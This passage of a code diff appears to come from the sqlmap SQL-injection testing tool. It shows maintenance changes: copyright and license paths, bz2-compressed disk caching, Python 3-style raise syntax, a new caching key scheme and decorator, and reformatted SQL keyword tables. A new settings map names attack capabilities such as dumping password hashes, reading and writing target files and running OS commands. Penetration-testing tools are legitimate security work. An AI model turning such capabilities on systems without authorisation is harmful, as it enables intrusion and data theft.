if " WHERE " in limitedQuery:
|
||||||
@@ -1071,7 +1066,7 @@ class Agent(object):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
_ = re.escape(PAYLOAD_DELIMITER)
|
_ = re.escape(PAYLOAD_DELIMITER)
|
||||||
return extractRegexResult("(?s)%s(?P<result>.*?)%s" % (_, _), value)
|
return extractRegexResult(r"(?s)%s(?P<result>.*?)%s" % (_, _), value)
|
||||||
|
|
||||||
def replacePayload(self, value, payload):
|
def replacePayload(self, value, payload):
|
||||||
"""
|
"""
|
||||||
@@ -1079,7 +1074,7 @@ class Agent(object):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
_ = re.escape(PAYLOAD_DELIMITER)
|
_ = re.escape(PAYLOAD_DELIMITER)
|
||||||
return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, getUnicode(payload), PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
|
return re.sub(r"(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, getUnicode(payload), PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
|
||||||
|
|
||||||
def runAsDBMSUser(self, query):
|
def runAsDBMSUser(self, query):
|
||||||
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
|
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
|
||||||
|
|||||||
@@ -1,15 +1,16 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
try:
|
||||||
import cPickle as pickle
|
import cPickle as pickle
|
||||||
except:
|
except:
|
||||||
import pickle
|
import pickle
|
||||||
|
|
||||||
|
import bz2
|
||||||
import itertools
|
import itertools
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
@@ -18,6 +19,7 @@ import tempfile
|
|||||||
from lib.core.enums import MKSTEMP_PREFIX
|
from lib.core.enums import MKSTEMP_PREFIX
|
||||||
from lib.core.exception import SqlmapSystemException
|
from lib.core.exception import SqlmapSystemException
|
||||||
from lib.core.settings import BIGARRAY_CHUNK_SIZE
|
from lib.core.settings import BIGARRAY_CHUNK_SIZE
|
||||||
|
from lib.core.settings import BIGARRAY_COMPRESS_LEVEL
|
||||||
|
|
||||||
DEFAULT_SIZE_OF = sys.getsizeof(object())
|
DEFAULT_SIZE_OF = sys.getsizeof(object())
|
||||||
|
|
||||||
@@ -27,10 +29,12 @@ def _size_of(object_):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
|
retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
|
||||||
|
|
||||||
if isinstance(object_, dict):
|
if isinstance(object_, dict):
|
||||||
retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
|
retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
|
||||||
elif hasattr(object_, "__iter__"):
|
elif hasattr(object_, "__iter__"):
|
||||||
retval += sum(_size_of(_) for _ in object_)
|
retval += sum(_size_of(_) for _ in object_)
|
||||||
|
|
||||||
return retval
|
return retval
|
||||||
|
|
||||||
class Cache(object):
|
class Cache(object):
|
||||||
@@ -48,7 +52,7 @@ class BigArray(list):
|
|||||||
List-like class used for storing large amounts of data (disk cached)
|
List-like class used for storing large amounts of data (disk cached)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self, items=[]):
|
||||||
self.chunks = [[]]
|
self.chunks = [[]]
|
||||||
self.chunk_length = sys.maxint
|
self.chunk_length = sys.maxint
|
||||||
self.cache = None
|
self.cache = None
|
||||||
@@ -56,13 +60,18 @@ class BigArray(list):
|
|||||||
self._os_remove = os.remove
|
self._os_remove = os.remove
|
||||||
self._size_counter = 0
|
self._size_counter = 0
|
||||||
|
|
||||||
|
for item in items:
|
||||||
|
self.append(item)
|
||||||
|
|
||||||
def append(self, value):
|
def append(self, value):
|
||||||
self.chunks[-1].append(value)
|
self.chunks[-1].append(value)
|
||||||
|
|
||||||
if self.chunk_length == sys.maxint:
|
if self.chunk_length == sys.maxint:
|
||||||
self._size_counter += _size_of(value)
|
self._size_counter += _size_of(value)
|
||||||
if self._size_counter >= BIGARRAY_CHUNK_SIZE:
|
if self._size_counter >= BIGARRAY_CHUNK_SIZE:
|
||||||
self.chunk_length = len(self.chunks[-1])
|
self.chunk_length = len(self.chunks[-1])
|
||||||
self._size_counter = None
|
self._size_counter = None
|
||||||
|
|
||||||
if len(self.chunks[-1]) >= self.chunk_length:
|
if len(self.chunks[-1]) >= self.chunk_length:
|
||||||
filename = self._dump(self.chunks[-1])
|
filename = self._dump(self.chunks[-1])
|
||||||
self.chunks[-1] = filename
|
self.chunks[-1] = filename
|
||||||
@@ -76,18 +85,20 @@ class BigArray(list):
|
|||||||
if len(self.chunks[-1]) < 1:
|
if len(self.chunks[-1]) < 1:
|
||||||
self.chunks.pop()
|
self.chunks.pop()
|
||||||
try:
|
try:
|
||||||
with open(self.chunks[-1], "rb") as fp:
|
with open(self.chunks[-1], "rb") as f:
|
||||||
self.chunks[-1] = pickle.load(fp)
|
self.chunks[-1] = pickle.loads(bz2.decompress(f.read()))
|
||||||
except IOError, ex:
|
except IOError, ex:
|
||||||
errMsg = "exception occurred while retrieving data "
|
errMsg = "exception occurred while retrieving data "
|
||||||
errMsg += "from a temporary file ('%s')" % ex.message
|
errMsg += "from a temporary file ('%s')" % ex.message
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
return self.chunks[-1].pop()
|
return self.chunks[-1].pop()
|
||||||
|
|
||||||
def index(self, value):
|
def index(self, value):
|
||||||
for index in xrange(len(self)):
|
for index in xrange(len(self)):
|
||||||
if self[index] == value:
|
if self[index] == value:
|
||||||
return index
|
return index
|
||||||
|
|
||||||
return ValueError, "%s is not in list" % value
|
return ValueError, "%s is not in list" % value
|
||||||
|
|
||||||
def _dump(self, chunk):
|
def _dump(self, chunk):
|
||||||
@@ -95,8 +106,8 @@ class BigArray(list):
|
|||||||
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY)
|
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY)
|
||||||
self.filenames.add(filename)
|
self.filenames.add(filename)
|
||||||
os.close(handle)
|
os.close(handle)
|
||||||
with open(filename, "w+b") as fp:
|
with open(filename, "w+b") as f:
|
||||||
pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
|
f.write(bz2.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL))
|
||||||
return filename
|
return filename
|
||||||
except (OSError, IOError), ex:
|
except (OSError, IOError), ex:
|
||||||
errMsg = "exception occurred while storing data "
|
errMsg = "exception occurred while storing data "
|
||||||
@@ -104,20 +115,21 @@ class BigArray(list):
|
|||||||
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||||
errMsg += "try to set environment variable 'TEMP' to a location "
|
errMsg += "try to set environment variable 'TEMP' to a location "
|
||||||
errMsg += "writeable by the current user"
|
errMsg += "writeable by the current user"
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def _checkcache(self, index):
|
def _checkcache(self, index):
|
||||||
if (self.cache and self.cache.index != index and self.cache.dirty):
|
if (self.cache and self.cache.index != index and self.cache.dirty):
|
||||||
filename = self._dump(self.cache.data)
|
filename = self._dump(self.cache.data)
|
||||||
self.chunks[self.cache.index] = filename
|
self.chunks[self.cache.index] = filename
|
||||||
|
|
||||||
if not (self.cache and self.cache.index == index):
|
if not (self.cache and self.cache.index == index):
|
||||||
try:
|
try:
|
||||||
with open(self.chunks[index], "rb") as fp:
|
with open(self.chunks[index], "rb") as f:
|
||||||
self.cache = Cache(index, pickle.load(fp), False)
|
self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False)
|
||||||
except IOError, ex:
|
except IOError, ex:
|
||||||
errMsg = "exception occurred while retrieving data "
|
errMsg = "exception occurred while retrieving data "
|
||||||
errMsg += "from a temporary file ('%s')" % ex.message
|
errMsg += "from a temporary file ('%s')" % ex.message
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def __getstate__(self):
|
def __getstate__(self):
|
||||||
return self.chunks, self.filenames
|
return self.chunks, self.filenames
|
||||||
@@ -127,19 +139,19 @@ class BigArray(list):
|
|||||||
self.chunks, self.filenames = state
|
self.chunks, self.filenames = state
|
||||||
|
|
||||||
def __getslice__(self, i, j):
|
def __getslice__(self, i, j):
|
||||||
retval = BigArray()
|
|
||||||
i = max(0, len(self) + i if i < 0 else i)
|
i = max(0, len(self) + i if i < 0 else i)
|
||||||
j = min(len(self), len(self) + j if j < 0 else j)
|
j = min(len(self), len(self) + j if j < 0 else j)
|
||||||
for _ in xrange(i, j):
|
|
||||||
retval.append(self[_])
|
return BigArray(self[_] for _ in xrange(i, j))
|
||||||
return retval
|
|
||||||
|
|
||||||
def __getitem__(self, y):
|
def __getitem__(self, y):
|
||||||
if y < 0:
|
if y < 0:
|
||||||
y += len(self)
|
y += len(self)
|
||||||
|
|
||||||
index = y / self.chunk_length
|
index = y / self.chunk_length
|
||||||
offset = y % self.chunk_length
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
||||||
|
|
||||||
if isinstance(chunk, list):
|
if isinstance(chunk, list):
|
||||||
return chunk[offset]
|
return chunk[offset]
|
||||||
else:
|
else:
|
||||||
@@ -150,6 +162,7 @@ class BigArray(list):
|
|||||||
index = y / self.chunk_length
|
index = y / self.chunk_length
|
||||||
offset = y % self.chunk_length
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
||||||
|
|
||||||
if isinstance(chunk, list):
|
if isinstance(chunk, list):
|
||||||
chunk[offset] = value
|
chunk[offset] = value
|
||||||
else:
|
else:
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
18
lib/core/convert.py
Executable file → Normal file
18
lib/core/convert.py
Executable file → Normal file
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
try:
|
||||||
@@ -80,7 +80,7 @@ def base64unpickle(value, unsafe=False):
|
|||||||
if len(self.stack) > 1:
|
if len(self.stack) > 1:
|
||||||
func = self.stack[-2]
|
func = self.stack[-2]
|
||||||
if func not in PICKLE_REDUCE_WHITELIST:
|
if func not in PICKLE_REDUCE_WHITELIST:
|
||||||
raise Exception, "abusing reduce() is bad, Mkay!"
|
raise Exception("abusing reduce() is bad, Mkay!")
|
||||||
self.load_reduce()
|
self.load_reduce()
|
||||||
|
|
||||||
def loads(str):
|
def loads(str):
|
||||||
@@ -94,7 +94,7 @@ def base64unpickle(value, unsafe=False):
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
retVal = loads(base64decode(value))
|
retVal = loads(base64decode(value))
|
||||||
except TypeError:
|
except TypeError:
|
||||||
retVal = loads(base64decode(bytes(value)))
|
retVal = loads(base64decode(bytes(value)))
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
@@ -110,7 +110,7 @@ def hexdecode(value):
|
|||||||
value = value.lower()
|
value = value.lower()
|
||||||
return (value[2:] if value.startswith("0x") else value).decode("hex")
|
return (value[2:] if value.startswith("0x") else value).decode("hex")
|
||||||
|
|
||||||
def hexencode(value):
|
def hexencode(value, encoding=None):
|
||||||
"""
|
"""
|
||||||
Encodes string value from plain to hex format
|
Encodes string value from plain to hex format
|
||||||
|
|
||||||
@@ -118,7 +118,7 @@ def hexencode(value):
|
|||||||
'666f6f626172'
|
'666f6f626172'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return utf8encode(value).encode("hex")
|
return unicodeencode(value, encoding).encode("hex")
|
||||||
|
|
||||||
def unicodeencode(value, encoding=None):
|
def unicodeencode(value, encoding=None):
|
||||||
"""
|
"""
|
||||||
@@ -166,7 +166,7 @@ def htmlunescape(value):
|
|||||||
|
|
||||||
retVal = value
|
retVal = value
|
||||||
if value and isinstance(value, basestring):
|
if value and isinstance(value, basestring):
|
||||||
codes = (('<', '<'), ('>', '>'), ('"', '"'), (' ', ' '), ('&', '&'))
|
codes = (("<", '<'), (">", '>'), (""", '"'), (" ", ' '), ("&", '&'), ("'", "'"))
|
||||||
retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
|
retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
|
||||||
try:
|
try:
|
||||||
retVal = re.sub(r"&#x([^ ;]+);", lambda match: unichr(int(match.group(1), 16)), retVal)
|
retVal = re.sub(r"&#x([^ ;]+);", lambda match: unichr(int(match.group(1), 16)), retVal)
|
||||||
@@ -174,7 +174,7 @@ def htmlunescape(value):
|
|||||||
pass
|
pass
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def singleTimeWarnMessage(message): # Cross-linked function
|
def singleTimeWarnMessage(message): # Cross-referenced function
|
||||||
sys.stdout.write(message)
|
sys.stdout.write(message)
|
||||||
sys.stdout.write("\n")
|
sys.stdout.write("\n")
|
||||||
sys.stdout.flush()
|
sys.stdout.flush()
|
||||||
@@ -193,7 +193,7 @@ def stdoutencode(data):
|
|||||||
warnMsg = "cannot properly display Unicode characters "
|
warnMsg = "cannot properly display Unicode characters "
|
||||||
warnMsg += "inside Windows OS command prompt "
|
warnMsg += "inside Windows OS command prompt "
|
||||||
warnMsg += "(http://bugs.python.org/issue1602). All "
|
warnMsg += "(http://bugs.python.org/issue1602). All "
|
||||||
warnMsg += "unhandled occurances will result in "
|
warnMsg += "unhandled occurrences will result in "
|
||||||
warnMsg += "replacement with '?' character. Please, find "
|
warnMsg += "replacement with '?' character. Please, find "
|
||||||
warnMsg += "proper character representation inside "
|
warnMsg += "proper character representation inside "
|
||||||
warnMsg += "corresponding output files. "
|
warnMsg += "corresponding output files. "
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.core.datatype import AttribDict
|
from lib.core.datatype import AttribDict
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import copy
|
import copy
|
||||||
|
|||||||
@@ -1,10 +1,14 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
|
||||||
|
from lib.core.threads import getCurrentThreadData
|
||||||
|
|
||||||
def cachedmethod(f, cache={}):
|
def cachedmethod(f, cache={}):
|
||||||
"""
|
"""
|
||||||
Method with a cached content
|
Method with a cached content
|
||||||
@@ -13,15 +17,25 @@ def cachedmethod(f, cache={}):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
def _(*args, **kwargs):
|
def _(*args, **kwargs):
|
||||||
try:
|
key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs))).hexdigest(), 16) & 0x7fffffffffffffff
|
||||||
key = (f, tuple(args), frozenset(kwargs.items()))
|
if key not in cache:
|
||||||
if key not in cache:
|
cache[key] = f(*args, **kwargs)
|
||||||
cache[key] = f(*args, **kwargs)
|
|
||||||
except:
|
|
||||||
key = "".join(str(_) for _ in (f, args, kwargs))
|
|
||||||
if key not in cache:
|
|
||||||
cache[key] = f(*args, **kwargs)
|
|
||||||
|
|
||||||
return cache[key]
|
return cache[key]
|
||||||
|
|
||||||
return _
|
return _
|
||||||
|
|
||||||
|
def stackedmethod(f):
|
||||||
|
def _(*args, **kwargs):
|
||||||
|
threadData = getCurrentThreadData()
|
||||||
|
originalLevel = len(threadData.valueStack)
|
||||||
|
|
||||||
|
try:
|
||||||
|
result = f(*args, **kwargs)
|
||||||
|
finally:
|
||||||
|
if len(threadData.valueStack) > originalLevel:
|
||||||
|
threadData.valueStack = threadData.valueStack[:originalLevel]
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
|
return _
|
||||||
|
|||||||
@@ -1,27 +1,27 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.core.datatype import AttribDict
|
from lib.core.datatype import AttribDict
|
||||||
|
|
||||||
_defaults = {
|
_defaults = {
|
||||||
"csvDel": ',',
|
"csvDel": ',',
|
||||||
"timeSec": 5,
|
"timeSec": 5,
|
||||||
"googlePage": 1,
|
"googlePage": 1,
|
||||||
"verbose": 1,
|
"verbose": 1,
|
||||||
"delay": 0,
|
"delay": 0,
|
||||||
"timeout": 30,
|
"timeout": 30,
|
||||||
"retries": 3,
|
"retries": 3,
|
||||||
"saFreq": 0,
|
"saFreq": 0,
|
||||||
"threads": 1,
|
"threads": 1,
|
||||||
"level": 1,
|
"level": 1,
|
||||||
"risk": 1,
|
"risk": 1,
|
||||||
"dumpFormat": "CSV",
|
"dumpFormat": "CSV",
|
||||||
"tech": "BEUSTQ",
|
"tech": "BEUSTQ",
|
||||||
"torType": "SOCKS5",
|
"torType": "SOCKS5",
|
||||||
}
|
}
|
||||||
|
|
||||||
defaults = AttribDict(_defaults)
|
defaults = AttribDict(_defaults)
|
||||||
|
|||||||
@@ -1,10 +1,11 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from lib.core.enums import CONTENT_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
from lib.core.enums import POST_HINT
|
from lib.core.enums import POST_HINT
|
||||||
@@ -184,10 +185,10 @@ DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}
|
|||||||
|
|
||||||
DBMS_DICT = {
|
DBMS_DICT = {
|
||||||
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"),
|
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"),
|
||||||
DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
|
DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/PyMySQL/PyMySQL", "mysql"),
|
||||||
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
|
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
|
||||||
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
|
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "https://oracle.github.io/python-cx_Oracle/", "oracle"),
|
||||||
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
|
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "https://docs.python.org/2/library/sqlite3.html", "sqlite"),
|
||||||
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"),
|
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"),
|
||||||
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
|
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
|
||||||
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
||||||
@@ -208,54 +209,60 @@ FROM_DUMMY_TABLE = {
|
|||||||
}
|
}
|
||||||
|
|
||||||
SQL_STATEMENTS = {
|
SQL_STATEMENTS = {
|
||||||
"SQL SELECT statement": (
|
"SQL SELECT statement": (
|
||||||
"select ",
|
"select ",
|
||||||
"show ",
|
"show ",
|
||||||
" top ",
|
" top ",
|
||||||
" distinct ",
|
" distinct ",
|
||||||
" from ",
|
" from ",
|
||||||
" from dual",
|
" from dual",
|
||||||
" where ",
|
" where ",
|
||||||
" group by ",
|
" group by ",
|
||||||
" order by ",
|
" order by ",
|
||||||
" having ",
|
" having ",
|
||||||
" limit ",
|
" limit ",
|
||||||
" offset ",
|
" offset ",
|
||||||
" union all ",
|
" union all ",
|
||||||
" rownum as ",
|
" rownum as ",
|
||||||
"(case ", ),
|
"(case ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data definition": (
|
"SQL data definition": (
|
||||||
"create ",
|
"create ",
|
||||||
"declare ",
|
"declare ",
|
||||||
"drop ",
|
"drop ",
|
||||||
"truncate ",
|
"truncate ",
|
||||||
"alter ", ),
|
"alter ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data manipulation": (
|
"SQL data manipulation": (
|
||||||
"bulk ",
|
"bulk ",
|
||||||
"insert ",
|
"insert ",
|
||||||
"update ",
|
"update ",
|
||||||
"delete ",
|
"delete ",
|
||||||
"merge ",
|
"merge ",
|
||||||
"load ", ),
|
"load ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data control": (
|
"SQL data control": (
|
||||||
"grant ",
|
"grant ",
|
||||||
"revoke ", ),
|
"revoke ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data execution": (
|
"SQL data execution": (
|
||||||
"exec ",
|
"exec ",
|
||||||
"execute ",
|
"execute ",
|
||||||
"values ",
|
"values ",
|
||||||
"call ", ),
|
"call ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL transaction": (
|
"SQL transaction": (
|
||||||
"start transaction ",
|
"start transaction ",
|
||||||
"begin work ",
|
"begin work ",
|
||||||
"begin transaction ",
|
"begin transaction ",
|
||||||
"commit ",
|
"commit ",
|
||||||
"rollback ", ),
|
"rollback ",
|
||||||
|
),
|
||||||
}
|
}
|
||||||
|
|
||||||
POST_HINT_CONTENT_TYPES = {
|
POST_HINT_CONTENT_TYPES = {
|
||||||
@@ -272,6 +279,9 @@ DEPRECATED_OPTIONS = {
|
|||||||
"--no-unescape": "use '--no-escape' instead",
|
"--no-unescape": "use '--no-escape' instead",
|
||||||
"--binary": "use '--binary-fields' instead",
|
"--binary": "use '--binary-fields' instead",
|
||||||
"--auth-private": "use '--auth-file' instead",
|
"--auth-private": "use '--auth-file' instead",
|
||||||
|
"--ignore-401": "use '--ignore-code' instead",
|
||||||
|
"--second-order": "use '--second-url' instead",
|
||||||
|
"--purge-output": "use '--purge' instead",
|
||||||
"--check-payload": None,
|
"--check-payload": None,
|
||||||
"--check-waf": None,
|
"--check-waf": None,
|
||||||
"--pickled-options": "use '--api -c ...' instead",
|
"--pickled-options": "use '--api -c ...' instead",
|
||||||
@@ -286,3 +296,31 @@ DEFAULT_DOC_ROOTS = {
|
|||||||
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
|
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
|
||||||
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
||||||
}
|
}
|
||||||
|
|
||||||
|
PART_RUN_CONTENT_TYPES = {
|
||||||
|
"checkDbms": CONTENT_TYPE.TECHNIQUES,
|
||||||
|
"getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
|
||||||
|
"getBanner": CONTENT_TYPE.BANNER,
|
||||||
|
"getCurrentUser": CONTENT_TYPE.CURRENT_USER,
|
||||||
|
"getCurrentDb": CONTENT_TYPE.CURRENT_DB,
|
||||||
|
"getHostname": CONTENT_TYPE.HOSTNAME,
|
||||||
|
"isDba": CONTENT_TYPE.IS_DBA,
|
||||||
|
"getUsers": CONTENT_TYPE.USERS,
|
||||||
|
"getPasswordHashes": CONTENT_TYPE.PASSWORDS,
|
||||||
|
"getPrivileges": CONTENT_TYPE.PRIVILEGES,
|
||||||
|
"getRoles": CONTENT_TYPE.ROLES,
|
||||||
|
"getDbs": CONTENT_TYPE.DBS,
|
||||||
|
"getTables": CONTENT_TYPE.TABLES,
|
||||||
|
"getColumns": CONTENT_TYPE.COLUMNS,
|
||||||
|
"getSchema": CONTENT_TYPE.SCHEMA,
|
||||||
|
"getCount": CONTENT_TYPE.COUNT,
|
||||||
|
"dumpTable": CONTENT_TYPE.DUMP_TABLE,
|
||||||
|
"search": CONTENT_TYPE.SEARCH,
|
||||||
|
"sqlQuery": CONTENT_TYPE.SQL_QUERY,
|
||||||
|
"tableExists": CONTENT_TYPE.COMMON_TABLES,
|
||||||
|
"columnExists": CONTENT_TYPE.COMMON_COLUMNS,
|
||||||
|
"readFile": CONTENT_TYPE.FILE_READ,
|
||||||
|
"writeFile": CONTENT_TYPE.FILE_WRITE,
|
||||||
|
"osCmd": CONTENT_TYPE.OS_CMD,
|
||||||
|
"regRead": CONTENT_TYPE.REG_READ
|
||||||
|
}
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import cgi
|
import cgi
|
||||||
@@ -46,6 +46,7 @@ from lib.core.settings import METADB_SUFFIX
|
|||||||
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
|
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
|
||||||
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
|
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT
|
||||||
from lib.core.settings import WINDOWS_RESERVED_NAMES
|
from lib.core.settings import WINDOWS_RESERVED_NAMES
|
||||||
from thirdparty.magic import magic
|
from thirdparty.magic import magic
|
||||||
|
|
||||||
@@ -140,7 +141,7 @@ class Dump(object):
|
|||||||
try:
|
try:
|
||||||
elements = set(elements)
|
elements = set(elements)
|
||||||
elements = list(elements)
|
elements = list(elements)
|
||||||
elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
elements.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
@@ -191,7 +192,7 @@ class Dump(object):
|
|||||||
userSettings = userSettings[0]
|
userSettings = userSettings[0]
|
||||||
|
|
||||||
users = userSettings.keys()
|
users = userSettings.keys()
|
||||||
users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
users.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
|
